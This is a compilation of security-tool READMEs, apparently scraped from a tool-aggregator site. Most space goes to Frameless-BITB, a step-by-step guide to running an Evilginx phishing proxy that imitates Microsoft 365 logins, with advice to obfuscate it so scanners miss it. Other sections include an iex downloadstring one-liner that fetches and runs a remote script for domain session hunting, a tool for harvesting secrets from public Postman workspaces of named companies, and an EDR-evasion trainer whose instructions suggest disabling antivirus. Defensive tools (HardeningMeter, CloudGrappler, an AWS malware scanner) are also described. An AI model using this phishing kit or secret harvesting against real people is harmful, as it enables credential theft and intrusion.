    20. In a Multi-Account scenario, this solution can be deployed directly on the AWS account hosting the AWS DRS solution. The Amazon GuardDuty findings will be automatically sent to the centralized Security Account.

    Usage

    Pre-requisites

    • An AWS Account.
    • Amazon Elastic Disaster Recovery (DRS) configured, with at least 1 source server in sync. If not, please check this documentation. The Replication Configuration must use EBS encryption with a Customer Managed Key (CMK) from AWS Key Management Service (AWS KMS). Amazon GuardDuty Malware Protection does not support the default AWS managed key for EBS.
    • IAM Privileges to deploy the components of this solution.
    • Amazon GuardDuty enabled. If not, please check this documentation
    • Amazon Security Hub enabled. If not, please check this documentation

      Warning
      Currently, Amazon GuardDuty Malware scan does not support EBS volumes encrypted with EBS-managed keys. If you want to use this solution to scan your on-prem (or other-cloud) servers replicated with DRS, you need to set up DRS replication with your own encryption key in KMS. If you are currently using EBS-managed keys with your replicating servers, you can change the encryption settings to use your own KMS key in the DRS console.

    Deploy

    1. Create a Cloud9 environment with an Ubuntu image (at least t3.small for better performance) in your AWS account. Open your Cloud9 environment and clone the code in this repository. Note: Amazon Linux 2 ships node v16, which is no longer supported since 2023-09-11.

      git clone https://github.com/aws-samples/drs-malware-scan

      cd drs-malware-scan

      sh check_loggroup.sh

    2. Deploy the CDK stack by running the following command in the Cloud9 terminal and confirm the deployment

      npm install
      cdk bootstrap
      cdk deploy --all

      Note: The solution is made of 2 stacks:
      * DrsMalwareScanStack: deploys all resources needed for the malware scanning feature. This stack is mandatory. If you want to deploy only this stack you can run cdk deploy DrsMalwareScanStack
      * ScanReportStack: deploys the resources needed for reporting (AWS Lambda and Amazon S3). This stack is optional. If you want to deploy only this stack you can run cdk deploy ScanReportStack

      If you want to deploy both stacks you can run cdk deploy --all

    Troubleshooting

    All Lambda functions route logs to Amazon CloudWatch. You can verify the execution of each function by inspecting the corresponding CloudWatch log groups; look for the /aws/lambda/DrsMalwareScanStack-* pattern.
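    For example, the relevant log groups can be listed with the AWS CLI (a sketch, assuming credentials with CloudWatch Logs read access):

      aws logs describe-log-groups --log-group-name-prefix "/aws/lambda/DrsMalwareScanStack-"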

    The duration of the malware scan operation will depend on the number of servers/volumes to scan (and their size). When Amazon GuardDuty finds malware, it generates a SecurityHub finding: the solution intercepts this event and runs the $StackName-SecurityHubAnnotations lambda to augment the SecurityHub finding with a note containing the name(s) of the DRS source server(s) with malware.

    The SQS FIFO queues can be monitored using the Messages available and Messages in flight metrics in the AWS SQS console.

    The DRS Volume Annotations DynamoDB table keeps track of the status of each malware scan operation.

    Amazon GuardDuty has documented reasons to skip scan operations. For further information please check Reasons for skipping resource during malware scan

    In order to analyze logs from Amazon GuardDuty malware scan operations, you can check the /aws/guardduty/malware-scan-events Amazon CloudWatch log group. The default log retention period for this log group is 90 days, after which the log events are deleted automatically.
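    For example, with AWS CLI v2 the scan events can be tailed directly (a sketch; requires the appropriate IAM permissions):

      aws logs tail /aws/guardduty/malware-scan-events --since 1d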

    Cleanup

    1. Run the following commands in your terminal:

      cdk destroy --all

    2. (Optional) Delete the CloudWatch log groups associated with Lambda Functions.

    AWS Cost Estimation Analysis

    For the purpose of this analysis, we have assumed a fictitious scenario to take as an example. The following cost estimates are based on services located in the North Virginia (us-east-1) region.

    Estimated scenario:

    • 2 Source Servers to replicate (DR) (Total Storage: 100GB - 4 disks)
    • 3 TB Malware Scanned/Month
    • 30 days of EBS snapshot Retention period
    • Daily Malware scans
    | Monthly Cost | Total Cost for 12 Months |
    |---|---|
    | 171.22 USD | 2,054.74 USD |

    Service Breakdown:

    | Service Name | Description | Monthly Cost (USD) |
    |---|---|---|
    | AWS Elastic Disaster Recovery | 2 Source Servers / 1 Replication Server / 4 disks / 100GB / 30 days of EBS Snapshot Retention Period | 71.41 |
    | Amazon GuardDuty | 3 TB Malware Scanned/Month | 94.56 |
    | Amazon DynamoDB | 100MB, 1 Read/Second, 1 Write/Second | 3.65 |
    | AWS Security Hub | 1 Account / 100 Security Checks / 1000 Findings Ingested | 0.10 |
    | AWS EventBridge | 1M custom events | 1.00 |
    | Amazon CloudWatch | 1GB ingested/month | 0.50 |
    | AWS Lambda | 5 ARM Lambda Functions - 128MB / 10secs | 0.00 |
    | Amazon SQS | 2 SQS FIFO queues | 0.00 |
    | Total | | 171.22 |

    Note: The figures presented here are estimates based on the assumptions described above, derived from the AWS Pricing Calculator. For further details please check this pricing calculator as a reference. You can adjust the services configuration in the referenced calculator to make your own estimation. This estimation does not include potential taxes or additional charges that might be applicable. It's crucial to remember that actual fees can vary based on usage and any additional services not covered in this analysis. For critical environments, it is advisable to include a Business Support Plan (not considered in the estimation).

    Security

    See CONTRIBUTING for more information.

    Authors



    Invoke-SessionHunter - Retrieve And Display Information About Active User Sessions On Remote Computers (No Admin Privileges Required)

    By: Zion3R


    Retrieve and display information about active user sessions on remote computers. No admin privileges required.

    The tool leverages the remote registry service to query the HKEY_USERS registry hive on the remote computers. It identifies and extracts Security Identifiers (SIDs) associated with active user sessions, and translates these into corresponding usernames, offering insights into who is currently logged in.

    If the -CheckAsAdmin switch is provided, it will gather sessions by authenticating to targets where you have local admin access using Invoke-WMIRemoting (which will most likely retrieve more results).

    It's important to note that the remote registry service needs to be running on the remote computer for the tool to work effectively. In my tests, if the service is stopped but its Startup type is configured to "Automatic" or "Manual", the service will start automatically on the target computer once queried (this is native behavior), and session information will be retrieved. If it is set to "Disabled", no session information can be retrieved from the target.


    Usage:

    iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/Invoke-SessionHunter/main/Invoke-SessionHunter.ps1')

    If run without parameters or switches it will retrieve active sessions for all computers in the current domain by querying the registry

    Invoke-SessionHunter

    Gather sessions by authenticating to targets where you have local admin access

    Invoke-SessionHunter -CheckAsAdmin

    You can optionally provide credentials in the following format

    Invoke-SessionHunter -CheckAsAdmin -UserName "ferrari\Administrator" -Password "P@ssw0rd!"

    You can also use the -FailSafe switch, which will direct the tool to proceed if the target remote registry becomes unresponsive.

    This works in combination with -Timeout | Default = 2; increase for slower networks.

    Invoke-SessionHunter -FailSafe
    Invoke-SessionHunter -FailSafe -Timeout 5

    Use the -Match switch to show only targets where you have admin access and a privileged user is logged in

    Invoke-SessionHunter -Match

    All switches can be combined

    Invoke-SessionHunter -CheckAsAdmin -UserName "ferrari\Administrator" -Password "P@ssw0rd!" -FailSafe -Timeout 5 -Match

    Specify the target domain

    Invoke-SessionHunter -Domain contoso.local

    Specify a comma-separated list of targets or the full path to a file containing a list of targets - one per line

    Invoke-SessionHunter -Targets "DC01,Workstation01.contoso.local"
    Invoke-SessionHunter -Targets c:\Users\Public\Documents\targets.txt

    Retrieve and display information about active user sessions on servers only

    Invoke-SessionHunter -Servers

    Retrieve and display information about active user sessions on workstations only

    Invoke-SessionHunter -Workstations

    Show active session for the specified user only

    Invoke-SessionHunter -Hunt "Administrator"

    Exclude localhost from the sessions retrieval

    Invoke-SessionHunter -IncludeLocalHost

    Return custom PSObjects instead of table-formatted results

    Invoke-SessionHunter -RawResults

    Do not run a port scan to enumerate for alive hosts before trying to retrieve sessions

    Note: if a host is not reachable it will hang for a while

    Invoke-SessionHunter -NoPortScan


    HardeningMeter - Open-Source Python Tool Carefully Designed To Comprehensively Assess The Security Hardening Of Binaries And Systems

    By: Zion3R


    HardeningMeter is an open-source Python tool carefully designed to comprehensively assess the security hardening of binaries and systems. Its robust capabilities include thorough checks of various binary exploitation protection mechanisms, including Stack Canary, RELRO, randomizations (ASLR, PIC, PIE), None Exec Stack, Fortify, ASAN, and the NX bit. This tool is suitable for all types of binaries and provides accurate information about the hardening status of each binary, identifying those that deserve attention and those with robust security measures. HardeningMeter supports all Linux distributions and machine-readable output; the results can be printed to the screen in a table format or exported to a CSV. (For more information see the Documentation.md file)


    Execute Scanning Example

    Scan the '/usr/bin' directory, the '/usr/sbin/newusers' file, the system and export the results to a csv file.

    python3 HardeningMeter.py -d /usr/bin -f /usr/sbin/newusers -s -c

    Installation Requirements

    Before installing HardeningMeter, make sure your machine has the following:

    1. readelf and file commands
    2. Python version 3
    3. pip
    4. tabulate

    pip install tabulate

    Install HardeningMeter

    The very latest developments can be obtained via git.

    Clone or download the project files (no compilation nor installation is required)

    git clone https://github.com/OfriOuzan/HardeningMeter

    Arguments

    -f --file

    Specify the files you want to scan; the argument accepts more than one file, separated by spaces.

    -d --directory

    Specify the directory you want to scan; the argument takes one directory and scans all ELF files in it recursively.

    -e --external

    Specify whether you want to add external checks (False by default).

    -m --show_missing

    Prints, in order, only those files that are missing security hardening mechanisms and need extra attention.

    -s --system

    Specify if you want to scan the system hardening methods.

    -c --csv_format

    Specify if you want to save the results to csv file (results are printed as a table to stdout by default).
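    For example, combining the flags above, the following illustrative invocation scans two files and prints only those missing hardening mechanisms:

    python3 HardeningMeter.py -f /bin/cp /bin/ls -m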

    Results

    HardeningMeter's results are printed as a table and consist of 3 different states:

    - (X) - This state indicates that the binary hardening mechanism is disabled.
    - (V) - This state indicates that the binary hardening mechanism is enabled.
    - (-) - This state indicates that the binary hardening mechanism is not relevant in this particular case.

    Notes

    When the default language on Linux is not English, make sure to add "LC_ALL=C" before calling the script.



    CrimsonEDR - Simulate The Behavior Of AV/EDR For Malware Development Training

    By: Zion3R


    CrimsonEDR is an open-source project engineered to identify specific malware patterns, offering a tool for honing skills in circumventing Endpoint Detection and Response (EDR). By leveraging diverse detection methods, it empowers users to deepen their understanding of security evasion tactics.


    Features

    | Detection | Description |
    |---|---|
    | Direct Syscall | Detects the usage of direct system calls, often employed by malware to bypass traditional API hooks. |
    | NTDLL Unhooking | Identifies attempts to unhook functions within the NTDLL library, a common evasion technique. |
    | AMSI Patch | Detects modifications to the Anti-Malware Scan Interface (AMSI) through byte-level analysis. |
    | ETW Patch | Detects byte-level alterations to Event Tracing for Windows (ETW), commonly manipulated by malware to evade detection. |
    | PE Stomping | Identifies instances of PE (Portable Executable) stomping. |
    | Reflective PE Loading | Detects the reflective loading of PE files, a technique employed by malware to avoid static analysis. |
    | Unbacked Thread Origin | Identifies threads originating from unbacked memory regions, often indicative of malicious activity. |
    | Unbacked Thread Start Address | Detects threads with start addresses pointing to unbacked memory, a potential sign of code injection. |
    | API hooking | Places a hook on the NtWriteVirtualMemory function to monitor memory modifications. |
    | Custom Pattern Search | Allows users to search for specific patterns provided in a JSON file, facilitating the identification of known malware signatures. |

    Installation

    To get started with CrimsonEDR, follow these steps:

    1. Install dependency:

       sudo apt-get install gcc-mingw-w64-x86-64

    2. Clone the repository:

       git clone https://github.com/Helixo32/CrimsonEDR

    3. Compile the project:

       cd CrimsonEDR; chmod +x compile.sh; ./compile.sh

    โš ๏ธ Warning

    Windows Defender and other antivirus programs may flag the DLL as malicious due to its content containing bytes used to verify if the AMSI has been patched. Please ensure to whitelist the DLL or disable your antivirus temporarily when using CrimsonEDR to avoid any interruptions.

    Usage

    To use CrimsonEDR, follow these steps:

    1. Make sure the ioc.json file is placed in the current directory from which the executable being monitored is launched. For example, if you launch your executable to monitor from C:\Users\admin\, the DLL will look for ioc.json in C:\Users\admin\ioc.json. Currently, ioc.json contains patterns related to msfvenom. You can easily add your own in the following format:
    {
      "IOC": [
        ["0x03", "0x4c", "0x24", "0x08", "0x45", "0x39", "0xd1", "0x75"],
        ["0xf1", "0x4c", "0x03", "0x4c", "0x24", "0x08", "0x45", "0x39"],
        ["0x58", "0x44", "0x8b", "0x40", "0x24", "0x49", "0x01", "0xd0"],
        ["0x66", "0x41", "0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40"],
        ["0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40", "0x1c", "0x49"],
        ["0x01", "0xc1", "0x38", "0xe0", "0x75", "0xf1", "0x4c", "0x03"],
        ["0x24", "0x49", "0x01", "0xd0", "0x66", "0x41", "0x8b", "0x0c"],
        ["0xe8", "0xcc", "0x00", "0x00", "0x00", "0x41", "0x51", "0x41"]
      ]
    }
    2. Execute CrimsonEDRPanel.exe with the following arguments:

      • -d <path_to_dll>: Specifies the path to the CrimsonEDR.dll file.

      • -p <process_id>: Specifies the Process ID (PID) of the target process where you want to inject the DLL.

    For example:

    .\CrimsonEDRPanel.exe -d C:\Temp\CrimsonEDR.dll -p 1234

    Useful Links

    Here are some useful resources that helped in the development of this project:

    Contact

    For questions, feedback, or support, please reach out to me via:



    Frameless-Bitb - A New Approach To Browser In The Browser (BITB) Without The Use Of Iframes, Allowing The Bypass Of Traditional Framebusters Implemented By Login Pages Like Microsoft And The Use With Evilginx

    By: Zion3R


    A new approach to Browser In The Browser (BITB) without the use of iframes, allowing the bypass of traditional framebusters implemented by login pages like Microsoft.

    This POC code is built for using this new BITB with Evilginx, and a Microsoft Enterprise phishlet.


    Before diving deep into this, I recommend that you first check my talk at BSides 2023, where I first introduced this concept along with important details on how to craft the "perfect" phishing attack. ▶ Watch Video

    ☕ Buy Me A Coffee

    Video Tutorial: 👇

    Disclaimer

    This tool is for educational and research purposes only. It demonstrates a non-iframe based Browser In The Browser (BITB) method. The author is not responsible for any misuse. Use this tool only legally and ethically, in controlled environments for cybersecurity defense testing. By using this tool, you agree to do so responsibly and at your own risk.

    Backstory - The Why

    Over the past year, I've been experimenting with different tricks to craft the "perfect" phishing attack. The typical "red flags" people are trained to look for are things like urgency, threats, authority, poor grammar, etc. The next best thing people nowadays check is the link/URL of the website they are interacting with, and they tend to get very conscious the moment they are asked to enter sensitive credentials like emails and passwords.

    That's where Browser In The Browser (BITB) came into play. Originally introduced by @mrd0x, BITB is a concept of creating the appearance of a believable browser window inside of which the attacker controls the content (by serving the malicious website inside an iframe). However, the fake URL bar of the fake browser window is set to the legitimate site the user would expect. This combined with a tool like Evilginx becomes the perfect recipe for a believable phishing attack.

    The problem is that over the past months/years, major websites like Microsoft implemented various little tricks called "framebusters/framekillers" which mainly attempt to break iframes that might be used to serve the proxied website like in the case of Evilginx.

    In short, Evilginx + BITB for websites like Microsoft no longer works. At least not with a BITB that relies on iframes.

    The What

    A Browser In The Browser (BITB) without any iframes! As simple as that.

    Meaning that we can now use BITB with Evilginx on websites like Microsoft.

    Evilginx here is just a strong example, but the same concept can be used for other use-cases as well.

    The How

    Framebusters target iframes specifically, so the idea is to create the BITB effect without the use of iframes, and without disrupting the original structure/content of the proxied page. This can be achieved by injecting scripts and HTML besides the original content using search and replace (aka substitutions), then relying completely on HTML/CSS/JS tricks to make the visual effect. We also use an additional trick called "Shadow DOM" in HTML to place the content of the landing page (background) in such a way that it does not interfere with the proxied content, allowing us to flexibly use any landing page with minor additional JS scripts.
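    As a minimal sketch of the substitution idea (hypothetical file and config names; the configs actually used by this project come later in these instructions), Apache's mod_substitute, enabled further below, can rewrite the proxied HTML on the fly to pull in the BITB scripts:

    # Sketch: append a (hypothetical) BITB script right before </head> in proxied HTML
    echo 'AddOutputFilterByType SUBSTITUTE text/html' | sudo tee /etc/apache2/conf-available/bitb-sub.conf >/dev/null
    echo 'Substitute "s|</head>|<script src=/bitb.js></script></head>|i"' | sudo tee -a /etc/apache2/conf-available/bitb-sub.conf >/dev/null
    sudo a2enconf bitb-sub && sudo systemctl reload apache2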

    Instructions



    Local VM:

    Create a local Linux VM. (I personally use Ubuntu 22 on VMWare Player or Parallels Desktop)

    Update and Upgrade system packages:

    sudo apt update && sudo apt upgrade -y

    Evilginx Setup:

    Optional:

    Create a new evilginx user, and add user to sudo group:

    sudo su

    adduser evilginx

    usermod -aG sudo evilginx

    Test that evilginx user is in sudo group:

    su - evilginx

    sudo ls -la /root

Navigate to the user's home dir:

    cd /home/evilginx

    (You can do everything as sudo user as well since we're running everything locally)

    Setting Up Evilginx

    Download and build Evilginx: Official Docs

    Copy Evilginx files to /home/evilginx

    Install Go: Official Docs

    wget https://go.dev/dl/go1.21.4.linux-amd64.tar.gz
    sudo tar -C /usr/local -xzf go1.21.4.linux-amd64.tar.gz
    nano ~/.profile

    ADD: export PATH=$PATH:/usr/local/go/bin

    source ~/.profile

    Check:

    go version

    Install make:

    sudo apt install make

    Build Evilginx:

    cd /home/evilginx/evilginx2
    make

    Create a new directory for our evilginx build along with phishlets and redirectors:

    mkdir /home/evilginx/evilginx

    Copy build, phishlets, and redirectors:

    cp /home/evilginx/evilginx2/build/evilginx /home/evilginx/evilginx/evilginx

    cp -r /home/evilginx/evilginx2/redirectors /home/evilginx/evilginx/redirectors

    cp -r /home/evilginx/evilginx2/phishlets /home/evilginx/evilginx/phishlets

    Ubuntu firewall quick fix (thanks to @kgretzky)

    sudo setcap CAP_NET_BIND_SERVICE=+eip /home/evilginx/evilginx/evilginx

On Ubuntu, if you get a Failed to start nameserver on: :53 error, try modifying this file:

    sudo nano /etc/systemd/resolved.conf

edit/add the DNSStubListener line and set it to no: DNSStubListener=no

    then

    sudo systemctl restart systemd-resolved

    Modify Evilginx Configurations:

    Since we will be using Apache2 in front of Evilginx, we need to make Evilginx listen to a different port than 443.

    nano ~/.evilginx/config.json

    CHANGE https_port from 443 to 8443

    Install Apache2 and Enable Mods:

    Install Apache2:

    sudo apt install apache2 -y

    Enable Apache2 mods that will be used: (We are also disabling access_compat module as it sometimes causes issues)

    sudo a2enmod proxy
    sudo a2enmod proxy_http
    sudo a2enmod proxy_balancer
    sudo a2enmod lbmethod_byrequests
    sudo a2enmod env
    sudo a2enmod include
    sudo a2enmod setenvif
    sudo a2enmod ssl
    sudo a2ensite default-ssl
    sudo a2enmod cache
    sudo a2enmod substitute
    sudo a2enmod headers
    sudo a2enmod rewrite
    sudo a2dismod access_compat

    Start and enable Apache:

    sudo systemctl start apache2
    sudo systemctl enable apache2

Check that Apache and the VM networking work by visiting the VM's IP from a browser on the host machine.

    Clone this Repo:

    Install git if not already available:

    sudo apt -y install git

    Clone this repo:

    git clone https://github.com/waelmas/frameless-bitb
    cd frameless-bitb

    Apache Custom Pages:

    Make directories for the pages we will be serving:

    • home: (Optional) Homepage (at base domain)
    • primary: Landing page (background)
    • secondary: BITB Window (foreground)
    sudo mkdir /var/www/home
    sudo mkdir /var/www/primary
    sudo mkdir /var/www/secondary

    Copy the directories for each page:


    sudo cp -r ./pages/home/ /var/www/

    sudo cp -r ./pages/primary/ /var/www/

    sudo cp -r ./pages/secondary/ /var/www/

    Optional: Remove the default Apache page (not used):

    sudo rm -r /var/www/html/

    Copy the O365 phishlet to phishlets directory:

    sudo cp ./O365.yaml /home/evilginx/evilginx/phishlets/O365.yaml

    Optional: To set the Calendly widget to use your account instead of the default I have inside, go to pages/primary/script.js and change the CALENDLY_PAGE_NAME and CALENDLY_EVENT_TYPE.

    Note on Demo Obfuscation: As I explain in the walkthrough video, I included a minimal obfuscation for text content like URLs and titles of the BITB. You can open the demo obfuscator by opening demo-obfuscator.html in your browser. In a real-world scenario, I would highly recommend that you obfuscate larger chunks of the HTML code injected or use JS tricks to avoid being detected and flagged. The advanced version I am working on will use a combination of advanced tricks to make it nearly impossible for scanners to fingerprint/detect the BITB code, so stay tuned.

    Self-signed SSL certificates:

    Since we are running everything locally, we need to generate self-signed SSL certificates that will be used by Apache. Evilginx will not need the certs as we will be running it in developer mode.

    We will use the domain fake.com which will point to our local VM. If you want to use a different domain, make sure to change the domain in all files (Apache conf files, JS files, etc.)

    Create dir and parents if they do not exist:

    sudo mkdir -p /etc/ssl/localcerts/fake.com/

    Generate the SSL certs using the OpenSSL config file:

    sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
    -keyout /etc/ssl/localcerts/fake.com/privkey.pem -out /etc/ssl/localcerts/fake.com/fullchain.pem \
    -config openssl-local.cnf

    Modify private key permissions:

    sudo chmod 600 /etc/ssl/localcerts/fake.com/privkey.pem

    Apache Custom Configs:

    Copy custom substitution files (the core of our approach):

    sudo cp -r ./custom-subs /etc/apache2/custom-subs

Important Note: In this repo I have included 2 substitution configs, for Chrome on Mac and Chrome on Windows BITB. Both have auto-detection and styling for light/dark mode, and they should act as base templates for achieving the same effect with other browser/OS combos. Since I did not include automatic detection of the browser/OS combo used to visit the phishing page, you will have to use one of the two or implement your own logic for automatic switching.

    Both config files under /apache-configs/ are the same, only with a different Include directive used for the substitution file that will be included. (there are 2 references for each file)

    # Uncomment the one you want and remember to restart Apache after any changes:
    #Include /etc/apache2/custom-subs/win-chrome.conf
    Include /etc/apache2/custom-subs/mac-chrome.conf

To make things easier for this next step, I included both versions as separate files.

    Windows/Chrome BITB:

    sudo cp ./apache-configs/win-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf

    Mac/Chrome BITB:

    sudo cp ./apache-configs/mac-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf

    Test Apache configs to ensure there are no errors:

    sudo apache2ctl configtest

    Restart Apache to apply changes:

    sudo systemctl restart apache2

    Modifying Hosts:

    Get the IP of the VM using ifconfig and note it somewhere for the next step.

    We now need to add new entries to our hosts file, to point the domain used in this demo fake.com and all used subdomains to our VM on which Apache and Evilginx are running.

    On Windows:

    Open Notepad as Administrator (Search > Notepad > Right-Click > Run as Administrator)

Click the File option (top-left) > Open, and in the File Explorer address bar, copy and paste the following:

    C:\Windows\System32\drivers\etc\

    Change the file types (bottom-right) to "All files".

    Double-click the file named hosts

    On Mac:

    Open a terminal and run the following:

    sudo nano /private/etc/hosts

    Now modify the following records (replace [IP] with the IP of your VM) then paste the records at the end of the hosts file:

    # Local Apache and Evilginx Setup
    [IP] login.fake.com
    [IP] account.fake.com
    [IP] sso.fake.com
    [IP] www.fake.com
    [IP] portal.fake.com
    [IP] fake.com
    # End of section

    Save and exit.

    Now restart your browser before moving to the next step.

    Note: On Mac, use the following command to flush the DNS cache:

    sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder

    Important Note:

This demo is made with the provided Office 365 Enterprise phishlet. To get the host entries you need to add for a different phishlet, use phishlets get-hosts [PHISHLET_NAME], but remember to replace the 127.0.0.1 with the actual local IP of your VM.

    Trusting the Self-Signed SSL Certs:

    Since we are using self-signed SSL certificates, our browser will warn us every time we try to visit fake.com so we need to make our host machine trust the certificate authority that signed the SSL certs.

    For this step, it's easier to follow the video instructions, but here is the gist anyway.

    Open https://fake.com/ in your Chrome browser.

    Ignore the Unsafe Site warning and proceed to the page.

Click the SSL icon > Details > Export Certificate. IMPORTANT: when saving, the name MUST end with .crt for Windows to open it correctly.

Double-click it > install for current user. Do NOT select automatic; instead, place the certificate in a specific store: select "Trusted Root Certification Authorities".

    On Mac: to install for current user only > select "Keychain: login" AND click on "View Certificates" > details > trust > Always trust

    Now RESTART your Browser

    You should be able to visit https://fake.com now and see the homepage without any SSL warnings.

    Running Evilginx:

    At this point, everything should be ready so we can go ahead and start Evilginx, set up the phishlet, create our lure, and test it.

    Optional: Install tmux (to keep evilginx running even if the terminal session is closed. Mainly useful when running on remote VM.)

    sudo apt install tmux -y

    Start Evilginx in developer mode (using tmux to avoid losing the session):

    tmux new-session -s evilginx
    cd ~/evilginx/
    ./evilginx -developer

    (To re-attach to the tmux session use tmux attach-session -t evilginx)

    Evilginx Config:

    config domain fake.com
    config ipv4 127.0.0.1

    IMPORTANT: Set Evilginx Blacklist mode to NoAdd to avoid blacklisting Apache since all requests will be coming from Apache and not the actual visitor IP.

    blacklist noadd

    Setup Phishlet and Lure:

    phishlets hostname O365 fake.com
    phishlets enable O365
    lures create O365
    lures get-url 0

    Copy the lure URL and visit it from your browser (use Guest user on Chrome to avoid having to delete all saved/cached data between tests).

    Useful Resources

    Original iframe-based BITB by @mrd0x: https://github.com/mrd0x/BITB

    Evilginx Mastery Course by the creator of Evilginx @kgretzky: https://academy.breakdev.org/evilginx-mastery

    My talk at BSides 2023: https://www.youtube.com/watch?v=p1opa2wnRvg

    How to protect Evilginx using Cloudflare and HTML Obfuscation: https://www.jackphilipbutton.com/post/how-to-protect-evilginx-using-cloudflare-and-html-obfuscation

    Evilginx resources for Microsoft 365 by @BakkerJan: https://janbakker.tech/evilginx-resources-for-microsoft-365/

    TODO

    • Create script(s) to automate most of the steps


    Porch-Pirate - The Most Comprehensive Postman Recon / OSINT Client And Framework That Facilitates The Automated Discovery And Exploitation Of API Endpoints And Secrets Committed To Workspaces, Collections, Requests, Users And Teams

    By: Zion3R


Porch Pirate started as a tool to quickly uncover Postman secrets, and has slowly begun to evolve into a multi-purpose reconnaissance / OSINT framework for Postman. While existing tools are great proofs of concept, they only attempt to identify very specific keywords as "secrets", in very limited locations, and with no consideration for recon beyond secrets. We realized we required capabilities that were "secret-agnostic" and flexible enough to capture false positives that still provided offensive value.

    Porch Pirate enumerates and presents sensitive results (global secrets, unique headers, endpoints, query parameters, authorization, etc), from publicly accessible Postman entities, such as:

    • Workspaces
    • Collections
    • Requests
    • Users
    • Teams

    Installation

    python3 -m pip install porch-pirate

    Using the client

The Porch Pirate client can be used to conduct nearly full reviews of public Postman entities in a quick and simple fashion. There are intended workflows and particular keywords that typically maximize results; these methodologies are described on our blog: Plundering Postman with Porch Pirate.

    Porch Pirate supports the following arguments to be performed on collections, workspaces, or users.

    • --globals
    • --collections
    • --requests
    • --urls
    • --dump
    • --raw
    • --curl

    Simple Search

    porch-pirate -s "coca-cola.com"

    Get Workspace Globals

    By default, Porch Pirate will display globals from all active and inactive environments if they are defined in the workspace. Provide a -w argument with the workspace ID (found by performing a simple search, or automatic search dump) to extract the workspace's globals, along with other information.

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8

    Dump Workspace

    When an interesting result has been found with a simple search, we can provide the workspace ID to the -w argument with the --dump command to begin extracting information from the workspace and its collections.

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --dump

    Automatic Search and Globals Extraction

    Porch Pirate can be supplied a simple search term, following the --globals argument. Porch Pirate will dump all relevant workspaces tied to the results discovered in the simple search, but only if there are globals defined. This is particularly useful for quickly identifying potentially interesting workspaces to dig into further.

    porch-pirate -s "shopify" --globals

    Automatic Search Dump

    Porch Pirate can be supplied a simple search term, following the --dump argument. Porch Pirate will dump all relevant workspaces and collections tied to the results discovered in the simple search. This is particularly useful for quickly sifting through potentially interesting results.

    porch-pirate -s "coca-cola.com" --dump

    Extract URLs from Workspace

    A particularly useful way to use Porch Pirate is to extract all URLs from a workspace and export them to another tool for fuzzing.

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --urls
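
Assuming the --urls output is one URL per line, it can be saved to a file and handed straight to a prober or fuzzer; for example, with httpx (whose -l flag reads targets from a file):

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --urls > postman_urls.txt
httpx -l postman_urls.txt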

    Automatic URL Extraction

    Porch Pirate will recursively extract all URLs from workspaces and their collections related to a simple search term.

    porch-pirate -s "coca-cola.com" --urls

    Show Collections in a Workspace

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --collections

    Show Workspace Requests

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --requests

    Show raw JSON

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --raw

    Show Entity Information

    porch-pirate -w WORKSPACE_ID
    porch-pirate -c COLLECTION_ID
    porch-pirate -r REQUEST_ID
    porch-pirate -u USERNAME/TEAMNAME

    Convert Request to Curl

    Porch Pirate can build curl requests when provided with a request ID for easier testing.

    porch-pirate -r 11055256-b1529390-18d2-4dce-812f-ee4d33bffd38 --curl

    Use a proxy

    porch-pirate -s coca-cola.com --proxy 127.0.0.1:8080

    Using as a library

    Searching

    p = porchpirate()
    print(p.search('coca-cola.com'))

    Get Workspace Collections

    p = porchpirate()
    print(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

    Dumping a Workspace

import json
from porchpirate import porchpirate  # import path assumed from the package name

p = porchpirate()
collections = json.loads(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
for collection in collections['data']:
    requests = collection['requests']
    for r in requests:
        request_data = p.request(r['id'])
        print(request_data)

    Grabbing a Workspace's Globals

    p = porchpirate()
    print(p.workspace_globals('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

    Other Examples

    Other library usage examples can be located in the examples directory, which contains the following examples:

    • dump_workspace.py
    • format_search_results.py
    • format_workspace_collections.py
    • format_workspace_globals.py
    • get_collection.py
    • get_collections.py
    • get_profile.py
    • get_request.py
    • get_statistics.py
    • get_team.py
    • get_user.py
    • get_workspace.py
    • recursive_globals_from_search.py
    • request_to_curl.py
    • search.py
    • search_by_page.py
    • workspace_collections.py


    CloudGrappler - A purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure

    By: Zion3R


    Permiso: https://permiso.io
    Read our release blog: https://permiso.io/blog/cloudgrappler-a-powerful-open-source-threat-detection-tool-for-cloud-environments

    CloudGrappler is a purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure.


    Notes

    To optimize your utilization of CloudGrappler, we recommend using shorter time ranges when querying for results. This approach enhances efficiency and accelerates the retrieval of information, ensuring a more seamless experience with the tool.

    Required Packages

pip3 install -r requirements.txt

    Cloning cloudgrep locally

    To clone the cloudgrep repository locally, run the clone.sh file. Alternatively, you can manually clone the repository into the same directory where CloudGrappler was cloned.

chmod +x clone.sh
./clone.sh

    Input

This tool offers a CLI (Command Line Interface); its usage is reviewed below.

    Example 1 - Running the tool with default queries file

    Define the scanning scope inside data_sources.json file based on your cloud infrastructure configuration. The following example showcases a structured data_sources.json file for both AWS and Azure environments:

    Note

    Modifying the source inside the queries.json file to a wildcard character (*) will scan the corresponding query across both AWS and Azure environments.

{
    "AWS": [
        {
            "bucket": "cloudtrail-logs-00000000-ffffff",
            "prefix": [
                "testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03",
                "testTrails/AWSLogs/00000000/CloudTrail/us-west-1/2024/03/04"
            ]
        },
        {
            "bucket": "aws-kosova-us-east-1-00000000"
        }
